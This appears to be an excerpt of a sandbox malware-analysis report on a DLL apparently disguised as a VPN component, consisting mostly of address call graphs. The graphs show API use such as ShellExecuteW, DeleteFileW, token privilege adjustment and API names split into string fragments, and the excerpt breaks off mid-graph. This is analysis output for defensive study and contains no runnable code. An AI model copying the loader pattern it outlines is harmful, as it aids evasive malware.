16640 18001562a 16639->16640 16642 180016cfc _invalid_parameter_noinfo DecodePointer 16640->16642 16662 18001dcfc 16641->16662 16652 180015635 _ioinit 16642->16652 16652->16620 16654 1800155a8 16653->16654 16655 1800155bd 16653->16655 16656 180015dc8 _errno 5 API calls 16654->16656 16655->16654 16657 1800155c3 16655->16657 16658 1800155ad 16656->16658 16725 1800154d4 16657->16725 16659 180016cfc _invalid_parameter_noinfo DecodePointer 16658->16659 16661 1800155b8 16659->16661 16661->16625 16670 18001dd15 16662->16670 16663 18001dd91 16696 1800131e4 LeaveCriticalSection 16663->16696 16666 18001dd9d 16666->16663 16693 180015828 16666->16693 16669 18001ddce EnterCriticalSection 16669->16663 16670->16663 16670->16666 16687 1800102ec 16670->16687 16690 180010370 16670->16690 16688 18001030d EnterCriticalSection 16687->16688 16689 1800102fa 16687->16689 16689->16670 16691 180010382 LeaveCriticalSection 16690->16691 16692 180010375 16690->16692 16692->16691 16694 180015843 InitializeCriticalSectionAndSpinCount 16693->16694 16695 18001583c 16693->16695 16694->16669 16695->16694 16726 180015507 16725->16726 16727 1800154f7 16725->16727 16729 18001551a 16726->16729 16737 18001de34 16726->16737 16728 180015dc8 _errno 5 API calls 16727->16728 16731 1800154fc 16728->16731 16761 18000ee28 16729->16761 16731->16661 16738 18001de56 16737->16738 16739 18001de75 16738->16739 16740 18001de8d 16738->16740 16741 180015dc8 _errno 5 API calls 16739->16741 16742 180016d58 _fileno 6 API calls 16740->16742 16743 18001de7a 16741->16743 16744 18001de92 16742->16744 16745 180016cfc _invalid_parameter_noinfo DecodePointer 16743->16745 16746 18001e148 _lseek 12 API calls 16744->16746 16760 18001de85 _setmbcp_nolock 16745->16760 16747 18001deaa 16746->16747 16748 18001e023 16747->16748 16749 18001df05 16747->16749 16747->16760 16750 18001e027 16748->16750 16754 18001dff9 16748->16754 16752 18001df1a 16749->16752 16749->16754 16751 180015dc8 _errno 5 API calls 16750->16751 16751->16760 16752->16760 16791 1800182cc 16752->16791 16755 18001e148 _lseek 12 API calls 16754->16755 16754->16760 16756 18001e06d 16755->16756 16757 18001e148 _lseek 12 API calls 16756->16757 16756->16760 16757->16760 16758 18001df36 _ftelli64_nolock 16759 18001e148 _lseek 12 API calls 16758->16759 16758->16760 16759->16760 16760->16729 16762 18000ee45 16761->16762 16766 18000ee6a 16761->16766 16763 180016d58 _fileno 6 API calls 16762->16763 16762->16766 16764 18000ee5c 16763->16764 16834 180017010 16764->16834 16767 180016d58 16766->16767 16768 180016d61 16767->16768 16769 180015552 16767->16769 16770 180015dc8 _errno 5 API calls 16768->16770 16773 18001e148 16769->16773 16771 180016d66 16770->16771 16772 180016cfc _invalid_parameter_noinfo DecodePointer 16771->16772 16772->16769 16774 18001e183 16773->16774 16775 18001e16b 16773->16775 16776 18001e1fc 16774->16776 16778 18001e1b6 16774->16778 16777 180015dc8 _errno 5 API calls 16775->16777 16780 180015dc8 _errno 5 API calls 16776->16780 16781 18001e178 16777->16781 16779 18001ea14 __lock_fhandle 3 API calls 16778->16779 16782 18001e1bd 16779->16782 16783 18001e209 16780->16783 16781->16731 16784 18001e1ca 16782->16784 16785 18001e1db 16782->16785 16786 180016cfc _invalid_parameter_noinfo DecodePointer 16783->16786 16850 18001e22c 16784->16850 16788 180015dc8 _errno 5 API calls 16785->16788 16786->16781 16789 18001e1d7 16788->16789 16863 18001ee74 LeaveCriticalSection 16789->16863 16792 1800182ef 16791->16792 16794 180018307 16791->16794 16796 180015dc8 _errno 5 API calls 16792->16796 16793 180018383 16797 180015dc8 _errno 5 API calls 16793->16797 16794->16793 16795 18001833a 16794->16795 16809 18001ea14 16795->16809 16808 1800182fc 16796->16808 16799 180018390 16797->16799 16801 180016cfc _invalid_parameter_noinfo DecodePointer 16799->16801 16800 180018341 16802 18001834e 16800->16802 16803 180018360 16800->16803 16801->16808 16815 1800183b4 16802->16815 16805 180015dc8 _errno 5 API calls 16803->16805 16806 18001835b 16805->16806 16824 18001ee74 LeaveCriticalSection 16806->16824 16808->16758 16810 18001ea80 EnterCriticalSection 16809->16810 16812 18001ea4c 16809->16812 16810->16800 16811 18001ea72 16825 1800131e4 LeaveCriticalSection 16811->16825 16812->16811 16813 180015828 _getstream InitializeCriticalSectionAndSpinCount 16812->16813 16813->16811 16826 18001ed50 16815->16826 16818 1800183ea SetFilePointerEx 16821 1800183de 16818->16821 16822 180018402 _commit 16818->16822 16819 1800183d9 16820 180015dc8 _errno 5 API calls 16819->16820 16820->16821 16821->16806 16823 180015d78 _dosmaperr 5 API calls 16822->16823 16823->16821 16827 18001ed59 16826->16827 16828 18001ed6e 16826->16828 16829 180015dc8 _errno 5 API calls 16827->16829 16830 180015dc8 _errno 5 API calls 16828->16830 16831 1800183d3 16828->16831 16829->16831 16832 18001edb0 16830->16832 16831->16818 16831->16819 16833 180016cfc _invalid_parameter_noinfo DecodePointer 16832->16833 16833->16831 16835 180017033 16834->16835 16836 18001704b 16834->16836 16838 180015dc8 _errno 5 API calls 16835->16838 16837 1800170c4 16836->16837 16839 18001707e 16836->16839 16840 180015dc8 _errno 5 API calls 16837->16840 16848 180017040 16838->16848 16841 18001ea14 __lock_fhandle 3 API calls 16839->16841 16842 1800170d1 16840->16842 16843 180017085 16841->16843 16844 180016cfc _invalid_parameter_noinfo DecodePointer 16842->16844 16845 180015dc8 _errno 5 API calls 16843->16845 16846 180017092 16843->16846 16844->16848 16845->16846 16849 18001ee74 LeaveCriticalSection 16846->16849 16848->16766 16851 18001ed50 _get_osfhandle 6 API calls 16850->16851 16852 18001e250 16851->16852 16853 18001e259 16852->16853 16854 18001e26c SetFilePointerEx 16852->16854 16855 180015dc8 _errno 5 API calls 16853->16855 16856 18001e295 SetFilePointerEx 16854->16856 16859 18001e286 _commit 16854->16859 16862 18001e25e 16855->16862 16857 18001e2ad 16856->16857 16856->16859 16858 18001e2b4 SetFilePointerEx 16857->16858 16857->16862 16860 180015dc8 _errno 5 API calls 16858->16860 16861 180015d78 _dosmaperr 5 API calls 16859->16861 16860->16862 16861->16862 16862->16789 16865 180001dc6 16864->16865 16866 180004420 16864->16866 16865->16631 16865->16632 16866->16865 16867 18000eb24 std::ios_base::_Init 8 API calls 16866->16867 16869 18000442d 16867->16869 16868 180004465 16868->16865 16871 180002a5c messages 22 API calls 16868->16871 16869->16868 16870 18000234c std::_Locinfo::_Locinfo 24 API calls 16869->16870 16870->16868 16871->16865 16873 18000265e _NMSG_WRITE 16872->16873 16882 18000547c 16873->16882 16875 180002676 16889 1800023f8 16875->16889 16877 180002692 _setmbcp_nolock 16877->16294 16879 18000428f _setmbcp_nolock 16878->16879 16881 1800042a9 _setmbcp_nolock 16878->16881 16879->16881 16916 18000f688 16879->16916 16881->16303 16883 1800054e5 16882->16883 16885 180005499 16882->16885 16894 180004594 16883->16894 16885->16883 16886 1800054c0 16885->16886 16888 180005394 std::_System_error::_System_error 9 API calls 16886->16888 16887 1800054e3 _fwrite_nolock 16887->16875 16888->16887 16890 180005394 std::_System_error::_System_error 9 API calls 16889->16890 16891 180002449 std::_System_error::_System_error 16890->16891 16892 180011798 std::exception::exception 6 API calls 16891->16892 16893 18000247d _setmbcp_nolock 16892->16893 16893->16877 16895 180004651 16894->16895 16896 1800045bd 16894->16896 16907 18000e104 16895->16907 16900 1800045ce _fwrite_nolock 16896->16900 16901 180004024 16896->16901 16900->16887 16902 18000405d 16901->16902 16903 18000eb24 std::ios_base::_Init 8 API calls 16902->16903 16905 1800040aa 16902->16905 16906 1800040b7 _fwrite_nolock 16902->16906 16903->16905 16905->16906 16912 18000e0c0 16905->16912 16906->16900 16908 180011798 std::exception::exception 6 API calls 16907->16908 16909 18000e11c 16908->16909 16910 180011998 _CxxThrowException 2 API calls 16909->16910 16911 18000e139 16910->16911 16913 18000e0e5 std::_Xbad_alloc 16912->16913 16914 180011998 _CxxThrowException 2 API calls 16913->16914 16915 18000e102 16914->16915 16917 18000f6b2 16916->16917 16924 18000f6d3 16916->16924 16918 18000f6c3 16917->16918 16920 18000f6d5 16917->16920 16917->16924 16919 180015dc8 _errno 5 API calls 16918->16919 16921 18000f6c8 16919->16921 16925 18000f4f8 16920->16925 16922 180016cfc _invalid_parameter_noinfo DecodePointer 16921->16922 16922->16924 16924->16879 16928 18000f526 16925->16928 16931 18000f540 16925->16931 16926 18000f530 16927 180015dc8 _errno 5 API calls 16926->16927 16929 18000f535 16927->16929 16928->16926 16928->16931 16934 18000f572 _fwrite_nolock 16928->16934 16930 180016cfc _invalid_parameter_noinfo DecodePointer 16929->16930 16930->16931 16931->16924 16932 18000ee28 _flush 9 API calls 16932->16934 16933 180016d58 _fileno 6 API calls 16933->16934 16934->16931 16934->16932 16934->16933 16935 180017010 _write 9 API calls 16934->16935 16935->16934 16942 1800052aa 16936->16942 16937 180005386 16939 18000e104 std::_System_error::_System_error 8 API calls 16937->16939 16938 18000530d 16941 180004660 9 API calls 16938->16941 16943 1800052d5 _fwrite_nolock 16938->16943 16940 180005392 16939->16940 16941->16943 16942->16937 16942->16938 16942->16943 16943->16223 16945 180004692 16944->16945 16946 180004728 16944->16946 16950 1800046a3 _fwrite_nolock 16945->16950 16951 180004128 16945->16951 16947 18000e104 std::_System_error::_System_error 8 API calls 16946->16947 16948 180004734 16947->16948 16948->16219 16950->16219 16953 180004166 16951->16953 16952 1800041c1 16955 18000e0c0 std::_Xbad_alloc 2 API calls 16952->16955 16956 1800041ce _fwrite_nolock 16952->16956 16953->16952 16954 18000eb24 std::ios_base::_Init 8 API calls 16953->16954 16953->16956 16954->16952 16955->16956 16956->16950 16958 1800077ba 16957->16958 16961 180007742 _fwrite_nolock 16957->16961 16959 18000e13c std::_System_error::_System_error 8 API calls 16958->16959 16960 1800077c6 16959->16960 16961->16238 16963 180011798 std::exception::exception 6 API calls 16962->16963 16964 18000e154 16963->16964 16965 180011998 _CxxThrowException 2 API calls 16964->16965 16966 18000e171 16965->16966 16968 18000810b 16967->16968 16975 1800080ba 16967->16975 16969 1800081d7 16968->16969 16970 180008118 16968->16970 16973 18000e13c std::_System_error::_System_error 8 API calls 16969->16973 16971 1800081e3 16970->16971 16972 180008128 16970->16972 16974 18000e104 std::_System_error::_System_error 8 API calls 16971->16974 16977 180004594 std::_System_error::_System_error 9 API calls 16972->16977 16980 180008106 _fwrite_nolock 16972->16980 16973->16971 16976 1800081f0 16974->16976 16975->16968 16978 1800080e1 16975->16978 16977->16980 16981 180007f18 16978->16981 16980->16246 16982 180008080 16981->16982 16983 180007f49 16981->16983 16984 18000e13c std::_System_error::_System_error 8 API calls 16982->16984 16983->16982 16985 180008074 16983->16985 16986 180007f75 16983->16986 16998 18000808d 16984->16998 16987 18000e104 std::_System_error::_System_error 8 API calls 16985->16987 16988 180004594 std::_System_error::_System_error 9 API calls 16986->16988 17001 180007f90 _fwrite_nolock 16986->17001 16987->16982 16988->17001 16989 18000810b 16990 1800081d7 16989->16990 16991 180008118 16989->16991 16994 18000e13c std::_System_error::_System_error 8 API calls 16990->16994 16992 1800081e3 16991->16992 16993 180008128 16991->16993 16995 18000e104 std::_System_error::_System_error 8 API calls 16992->16995 16997 180004594 std::_System_error::_System_error 9 API calls 16993->16997 17002 180008106 _fwrite_nolock 16993->17002 16994->16992 16996 1800081f0 16995->16996 16997->17002 16998->16989 16999 1800080e1 16998->16999 17000 180007f18 9 API calls 16999->17000 17000->17002 17001->16980 17002->16980 17004 180002592 17003->17004 17005 18000127c 17004->17005 17011 180007a80 17004->17011 17005->16254 17005->16256 17008 180004c7c 17007->17008 17009 180004c40 17007->17009 17008->16257 17009->17008 17010 1800069ac std::ios_base::_Init 12 API calls 17009->17010 17010->17008 17012 180007aa5 17011->17012 17015 180007b0a 17011->17015 17013 180002560 12 API calls 17012->17013 17014 180007ab2 17013->17014 17017 1800069ac std::ios_base::_Init 12 API calls 17014->17017 17018 180007af6 17014->17018 17015->17005 17016 180004c20 12 API calls 17016->17015 17017->17018 17018->17015 17018->17016 17020 180002560 12 API calls 17019->17020 17021 180008d8f 17020->17021 17022 1800069ac std::ios_base::_Init 12 API calls 17021->17022 17023 180008e3b 17021->17023 17022->17023 17024 180001a8f 17023->17024 17025 180004c20 12 API calls 17023->17025 17024->16265 17025->17024 17026 1800246dc 17027 1800246ea 17026->17027 17028 180024724 _commit 17026->17028 17027->17028 17055 180024290 17027->17055 17030 180015d78 _dosmaperr 5 API calls 17028->17030 17031 180024769 GetFileType 17028->17031 17032 18002475d 17030->17032 17033 1800247c2 17031->17033 17034 180015dc8 _errno 5 API calls 17032->17034 17061 18001edc4 17033->17061 17035 180024762 17034->17035 17035->17031 17042 180024a2a 17035->17042 17037 1800247e1 17038 1800183b4 _lseeki64_nolock 7 API calls 17037->17038 17040 180024a06 __termconin 17037->17040 17049 180024851 17037->17049 17038->17049 17041 180024290 __createFile 2 API calls 17040->17041 17040->17042 17045 180024ba7 _commit 17041->17045 17043 180017010 _write 9 API calls 17043->17049 17044 180024a1e 17047 180016e44 _close_nolock 6 API calls 17044->17047 17045->17042 17048 180015d78 _dosmaperr 5 API calls 17045->17048 17046 1800183b4 7 API calls _lseeki64_nolock 17046->17049 17050 180024a25 17047->17050 17051 180024bba 17048->17051 17049->17040 17049->17043 17049->17044 17049->17046 17065 180016e44 17049->17065 17052 180015dc8 _errno 5 API calls 17050->17052 17078 18001eca4 17051->17078 17052->17042 17054 180024bdc 17054->17054 17056 1800242b4 17055->17056 17057 180024333 CreateFileW 17056->17057 17058 1800242b8 GetModuleHandleW 17056->17058 17059 180024367 17057->17059 17060 1800242d5 _init_pointers 17058->17060 17059->17028 17060->17059 17062 18001ede0 17061->17062 17063 180015dc8 _errno 5 API calls 17062->17063 17064 18001ee0b _free_osfhnd 17062->17064 17063->17064 17064->17037 17066 18001ed50 _get_osfhandle 6 API calls 17065->17066 17067 180016e58 17066->17067 17071 18001ed50 _get_osfhandle 6 API calls 17067->17071 17076 180016e94 17067->17076 17077 180016ea0 __termconin _commit 17067->17077 17068 18001eca4 _free_osfhnd 5 API calls 17070 180016ec0 17068->17070 17069 18001ed50 _get_osfhandle 6 API calls 17069->17077 17073 180015d78 _dosmaperr 5 API calls 17070->17073 17075 180016eec 17070->17075 17072 180016e87 17071->17072 17074 18001ed50 _get_osfhandle 6 API calls 17072->17074 17073->17075 17074->17076 17075->17049 17076->17069 17076->17077 17077->17068 17079 18001ecb8 17078->17079 17080 180015dc8 _errno 5 API calls 17079->17080 17081 18001ecea _free_osfhnd 17079->17081 17080->17081 17081->17054 17082 180012cbe 17083 180012cc3 _heap_init 17082->17083 17091 18001a4c8 17083->17091 17085 180012cd3 _RTC_Initialize 17086 180012ce3 GetCommandLineA 17085->17086 17102 18001d0a4 GetEnvironmentStringsW 17086->17102 17088 180012cf5 17110 180017a2c 17088->17110 17090 180012d01 17125 180010d70 EncodePointer 17091->17125 17093 18001a4d3 17131 180013180 17093->17131 17095 18001a4d8 17096 180015060 _calloc_crt 5 API calls 17095->17096 17101 18001a526 __security_init_cookie _mtterm 17095->17101 17097 18001a502 17096->17097 17097->17101 17135 18001580c 17097->17135 17101->17085 17103 18001d0d2 WideCharToMultiByte 17102->17103 17107 18001d161 __crtGetEnvironmentStringsA 17102->17107 17105 18001d121 17103->17105 17103->17107 17106 18001d131 WideCharToMultiByte 17105->17106 17105->17107 17106->17107 17108 18001d159 17106->17108 17107->17088 17109 180011058 free 5 API calls 17108->17109 17109->17107 17111 180017a5b 17110->17111 17112 180015060 _calloc_crt 5 API calls 17111->17112 17123 180017a6f _ioinit 17112->17123 17113 180017a7f _ioinit 17113->17090 17114 180017d2b 17139 1800131e4 LeaveCriticalSection 17114->17139 17116 180017c8e GetStdHandle 17118 180017cb9 GetFileType 17116->17118 17119 180017c46 17116->17119 17117 180015060 _calloc_crt 5 API calls 17117->17123 17118->17119 17119->17114 17119->17116 17122 180015828 _getstream InitializeCriticalSectionAndSpinCount 17119->17122 17120 180017b60 17120->17119 17121 180017be8 GetFileType 17120->17121 17124 180015828 _getstream InitializeCriticalSectionAndSpinCount 17120->17124 17121->17120 17122->17119 17123->17113 17123->17117 17123->17119 17123->17120 17124->17120 17126 180010d89 _init_pointers 17125->17126 17138 18001968c EncodePointer 17126->17138 17128 180010da9 _init_pointers 17129 1800158a0 GetModuleHandleW 17128->17129 17130 1800158c6 _init_pointers 17129->17130 17130->17093 17132 18001319b 17131->17132 17133 180015828 _getstream InitializeCriticalSectionAndSpinCount 17132->17133 17134 1800131ce 17132->17134 17133->17132 17134->17095 17136 18001581c 17135->17136 17137 18001581f TlsSetValue 17135->17137 17136->17137 17138->17128 17140 1800076bf 17141 1800076c5 _commit 17140->17141 17142 1800076db 17141->17142 17149 180003cfc 17141->17149 17144 1800076d1 17147 180003bf4 GetTickCount64 Sleep SleepEx 17144->17147 17146 1800076d6 17146->17142 17148 180003c32 17147->17148 17148->17146 17150 180003d18 17149->17150 17151 180003d0f ExitProcess 17149->17151 17150->17144 17151->17150 17152 1800115e0 LoadLibraryExW 17153 180011605 _init_pointers 17152->17153 17154 18001163b ExitThread 17153->17154 17155 18001165b 17154->17155 17156 1800157f0 _getptd_noexit TlsGetValue 17155->17156 17157 180011662 17156->17157 17158 18001580c _mtinit TlsSetValue 17157->17158 17159 18001167b 17158->17159 17160 18001167f _commit 17159->17160 17162 18001168e __security_init_cookie 17159->17162 17161 180011685 ExitThread 17160->17161 17161->17162 17163 1800187bf WaitForSingleObject 17164 1800187d3 GetExitCodeProcess 17163->17164 17165 1800187ea _commit 17163->17165 17164->17165 17169 1800187e5 __termconin 17164->17169 17166 1800187f5 17165->17166 17167 18001880d _commit 17165->17167 17168 180015dc8 _errno 5 API calls 17166->17168 17170 180015d78 _dosmaperr 5 API calls 17167->17170 17168->17169 17170->17169 17171 1800030e0 17172 180003cfc ExitProcess 17171->17172 17173 1800030e9 17172->17173 17180 180003848 GetCurrentProcess OpenProcessToken 17173->17180 17175 1800030ee 17187 180011938 GetSystemTimeAsFileTime 17175->17187 17179 1800030fd 17181 18000389a LookupPrivilegeValueW 17180->17181 17182 180003893 _setmbcp_nolock __termconin 17180->17182 17181->17182 17183 1800038b1 AdjustTokenPrivileges 17181->17183 17182->17175 17183->17182 17184 1800038ed _commit 17183->17184 17184->17182 17192 180011498 17184->17192 17188 1800030f5 17187->17188 17189 180011040 17188->17189 17190 18001a35c _getptd 18 API calls 17189->17190 17191 18001104d 17190->17191 17191->17179 17193 1800114c3 17192->17193 17194 1800114d8 17192->17194 17195 180015dc8 _errno 5 API calls 17193->17195 17196 180015060 _calloc_crt 5 API calls 17194->17196 17197 1800114c8 17195->17197 17198 1800114e7 17196->17198 17199 180016cfc _invalid_parameter_noinfo DecodePointer 17197->17199 17200 18001154f _commit 17198->17200 17202 18001a35c _getptd 18 API calls 17198->17202 17204 18000391a Sleep 17199->17204 17201 180011058 free 5 API calls 17200->17201 17203 18001155f 17201->17203 17205 1800114f4 17202->17205 17203->17204 17208 180015d78 _dosmaperr 5 API calls 17203->17208 17204->17182 17209 18001a404 17205->17209 17208->17204 17210 18001a46a 17209->17210 17215 1800131e4 LeaveCriticalSection 17210->17215 17212 18001a47f __addlocaleref 17213 1800131e4 _locterm LeaveCriticalSection 17212->17213 17214 180011503 CreateThread 17213->17214 17214->17200 17214->17204

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 000000018000583A Relevance: 51.5, APIs: 17, Strings: 12, Instructions: 786librarysleeploaderCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 0 18000583a-18000586a call 18000eaf0 3 180005878-180005896 0->3 4 18000586c-180005873 call 18000eaf0 0->4 6 1800058a4-1800058c2 3->6 7 180005898-18000589f call 18000eaf0 3->7 4->3 9 1800058c4-1800058cb call 18000eaf0 6->9 10 1800058d0-1800058ee 6->10 7->6 9->10 12 1800058fc-180005945 call 180002028 10->12 13 1800058f0-1800058f7 call 18000eaf0 10->13 17 180005b9a-180005d97 call 180006a90 call 1800018e4 LoadLibraryW call 18002a158 ShellExecuteW LoadLibraryW call 18002a158 Sleep DeleteFileW call 180003948 12->17 18 18000594b 12->18 13->12 41 180005d99 17->41 42 180005d9c-180005de6 call 180002f78 call 180003b3c call 1800016d0 call 1800015f4 17->42 19 18000594f-1800059c3 call 180005394 call 180009490 call 1800014c4 18->19 34 1800059d1-180005aaa call 18000151c call 18000146c call 180001430 call 18000146c 19->34 35 1800059c5-1800059cc call 18000eaf0 19->35 54 180005ab8-180005ad5 34->54 55 180005aac-180005ab3 call 18000eaf0 34->55 35->34 41->42 65 180005df1-180005e05 42->65 66 180005de8-180005dec call 18000eaf0 42->66 58 180005ae3-180005afd 54->58 59 180005ad7-180005ade call 18000eaf0 54->59 55->54 62 180005b08-180005b38 call 180001220 call 180001a20 58->62 63 180005aff-180005b03 call 18000eaf0 58->63 59->58 81 180005b46-180005b63 62->81 82 180005b3a-180005b41 call 18000eaf0 62->82 63->62 70 180005e13-180005e30 65->70 71 180005e07-180005e0e call 18000eaf0 65->71 66->65 74 180005e32-180005e39 call 18000eaf0 70->74 75 180005e3e-180005e5c 70->75 71->70 74->75 78 180005e6a-180005eb7 CreateDirectoryW call 180003948 75->78 79 180005e5e-180005e65 call 18000eaf0 75->79 92 180005eb9 78->92 93 180005ebc-180005f1a call 180002f78 call 180001808 call 1800015f4 call 1800016d0 78->93 79->78 86 180005b72-180005b7a 81->86 87 180005b65-180005b71 call 18000eaf0 81->87 82->81 90 180005b88-180005b8e 86->90 91 180005b7c-180005b83 call 18000eaf0 86->91 87->86 90->19 97 180005b94 90->97 91->90 92->93 105 180005f28-180005f45 93->105 106 180005f1c-180005f23 call 18000eaf0 93->106 97->17 108 180005f53-180005f70 105->108 109 180005f47-180005f4e call 18000eaf0 105->109 106->105 111 180005f72-180005f79 call 18000eaf0 108->111 112 180005f7e-180005f9c 108->112 109->108 111->112 113 180005faa-180005ff6 call 180006b28 Sleep 112->113 114 180005f9e-180005fa5 call 18000eaf0 112->114 119 180005ff8-180005ffb 113->119 120 180005ffd 113->120 114->113 121 180006005-1800060d2 call 180005638 call 180003e68 call 180001808 call 1800016d0 119->121 120->121 122 180006000 call 1800103cc 120->122 131 1800060d4-1800060d8 call 18000eaf0 121->131 132 1800060dd-18000622a call 1800018e4 call 180001808 * 5 call 1800016d0 121->132 122->121 131->132 148 180006238-1800062d7 call 1800018e4 call 18000167c * 2 132->148 149 18000622c-180006233 call 18000eaf0 132->149 157 1800062e5-1800062ff 148->157 158 1800062d9-1800062e0 call 18000eaf0 148->158 149->148 160 180006301-180006305 call 18000eaf0 157->160 161 18000630a-1800063cf call 180003b3c call 1800016d0 * 2 157->161 158->157 160->161 169 1800063d1-1800063d8 call 18000eaf0 161->169 170 1800063dd-1800063fa 161->170 169->170 172 180006408-18000645d call 180003b3c call 1800016d0 * 2 170->172 173 1800063fc-180006403 call 18000eaf0 170->173 181 18000646b-180006485 172->181 182 18000645f-180006466 call 18000eaf0 172->182 173->172 184 180006487-18000648b call 18000eaf0 181->184 185 180006490-18000661c call 180003b3c call 18000547c call 180005540 * 2 call 180003d20 Sleep ShellExecuteW Sleep 181->185 182->181 184->185 197 180006623 185->197 198 18000661e-180006621 185->198 199 18000662f-180006676 call 180005638 197->199 200 18000662a call 1800103cc 197->200 198->199 203 180006678-18000667b 199->203 204 18000667d 199->204 200->199 205 180006685-1800067e4 call 180005638 * 2 call 180002270 call 18000310c Sleep call 180002270 * 4 call 18000310c DeleteFileW * 3 call 180004df0 203->205 204->205 206 180006680 call 1800103cc 204->206 226 1800067e9-18000693d call 180004df0 * 13 call 18000286c call 18000e8b0 call 180004df0 call 180004e58 call 180012200 205->226 206->205
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryLoadProcSleep$CreateDeleteDirectoryExecuteFileShell
                                                                                                                                                                                                    • String ID: 255$ sta$.0.0$1.0.$Dele$Shel$cute$lExe$leW$teFi$tic $~16
                                                                                                                                                                                                    • API String ID: 1872526433-501238091
                                                                                                                                                                                                    • Opcode ID: 2de8ca2edf32e5d592ad1db038b95d3c579e97f9fa53fb0bd541c60e535d2964
                                                                                                                                                                                                    • Instruction ID: c9c4ca4ab1ae5be6749216688ddcecd4b28c08cb2a744ea5c2d942ebc46c746f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2de8ca2edf32e5d592ad1db038b95d3c579e97f9fa53fb0bd541c60e535d2964
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73920572211BC88AE7B2DF20DC947DD33A5F74938CF809125EA495BAAADF718748C744
                                                                                                                                                                                                    Function 00000001800057CD Relevance: 44.5, APIs: 17, Strings: 8, Instructions: 715COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 263 1800057cd-18000586a call 180002f78 call 180003b3c call 1800016d0 call 1800015f4 call 1800016d0 275 180005878-180005896 263->275 276 18000586c-180005873 call 18000eaf0 263->276 278 1800058a4-1800058c2 275->278 279 180005898-18000589f call 18000eaf0 275->279 276->275 281 1800058c4-1800058cb call 18000eaf0 278->281 282 1800058d0-1800058ee 278->282 279->278 281->282 284 1800058fc-180005945 call 180002028 282->284 285 1800058f0-1800058f7 call 18000eaf0 282->285 289 180005b9a-180005d97 call 180006a90 call 1800018e4 LoadLibraryW call 18002a158 ShellExecuteW LoadLibraryW call 18002a158 Sleep DeleteFileW call 180003948 284->289 290 18000594b 284->290 285->284 313 180005d99 289->313 314 180005d9c-180005de6 call 180002f78 call 180003b3c call 1800016d0 call 1800015f4 289->314 291 18000594f-1800059c3 call 180005394 call 180009490 call 1800014c4 290->291 306 1800059d1-180005aaa call 18000151c call 18000146c call 180001430 call 18000146c 291->306 307 1800059c5-1800059cc call 18000eaf0 291->307 326 180005ab8-180005ad5 306->326 327 180005aac-180005ab3 call 18000eaf0 306->327 307->306 313->314 337 180005df1-180005e05 314->337 338 180005de8-180005dec call 18000eaf0 314->338 330 180005ae3-180005afd 326->330 331 180005ad7-180005ade call 18000eaf0 326->331 327->326 334 180005b08-180005b38 call 180001220 call 180001a20 330->334 335 180005aff-180005b03 call 18000eaf0 330->335 331->330 353 180005b46-180005b63 334->353 354 180005b3a-180005b41 call 18000eaf0 334->354 335->334 342 180005e13-180005e30 337->342 343 180005e07-180005e0e call 18000eaf0 337->343 338->337 346 180005e32-180005e39 call 18000eaf0 342->346 347 180005e3e-180005e5c 342->347 343->342 346->347 350 180005e6a-180005eb7 CreateDirectoryW call 180003948 347->350 351 180005e5e-180005e65 call 18000eaf0 347->351 364 180005eb9 350->364 365 180005ebc-180005f1a call 180002f78 call 180001808 call 1800015f4 call 1800016d0 350->365 351->350 358 180005b72-180005b7a 353->358 359 180005b65-180005b71 call 18000eaf0 353->359 354->353 362 180005b88-180005b8e 358->362 363 180005b7c-180005b83 call 18000eaf0 358->363 359->358 362->291 369 180005b94 362->369 363->362 364->365 377 180005f28-180005f45 365->377 378 180005f1c-180005f23 call 18000eaf0 365->378 369->289 380 180005f53-180005f70 377->380 381 180005f47-180005f4e call 18000eaf0 377->381 378->377 383 180005f72-180005f79 call 18000eaf0 380->383 384 180005f7e-180005f9c 380->384 381->380 383->384 385 180005faa-180005ff6 call 180006b28 Sleep 384->385 386 180005f9e-180005fa5 call 18000eaf0 384->386 391 180005ff8-180005ffb 385->391 392 180005ffd 385->392 386->385 393 180006005-1800060d2 call 180005638 call 180003e68 call 180001808 call 1800016d0 391->393 392->393 394 180006000 call 1800103cc 392->394 403 1800060d4-1800060d8 call 18000eaf0 393->403 404 1800060dd-18000622a call 1800018e4 call 180001808 * 5 call 1800016d0 393->404 394->393 403->404 420 180006238-1800062d7 call 1800018e4 call 18000167c * 2 404->420 421 18000622c-180006233 call 18000eaf0 404->421 429 1800062e5-1800062ff 420->429 430 1800062d9-1800062e0 call 18000eaf0 420->430 421->420 432 180006301-180006305 call 18000eaf0 429->432 433 18000630a-1800063cf call 180003b3c call 1800016d0 * 2 429->433 430->429 432->433 441 1800063d1-1800063d8 call 18000eaf0 433->441 442 1800063dd-1800063fa 433->442 441->442 444 180006408-18000645d call 180003b3c call 1800016d0 * 2 442->444 445 1800063fc-180006403 call 18000eaf0 442->445 453 18000646b-180006485 444->453 454 18000645f-180006466 call 18000eaf0 444->454 445->444 456 180006487-18000648b call 18000eaf0 453->456 457 180006490-18000661c call 180003b3c call 18000547c call 180005540 * 2 call 180003d20 Sleep ShellExecuteW Sleep 453->457 454->453 456->457 469 180006623 457->469 470 18000661e-180006621 457->470 471 18000662f-180006676 call 180005638 469->471 472 18000662a call 1800103cc 469->472 470->471 475 180006678-18000667b 471->475 476 18000667d 471->476 472->471 477 180006685-18000693d call 180005638 * 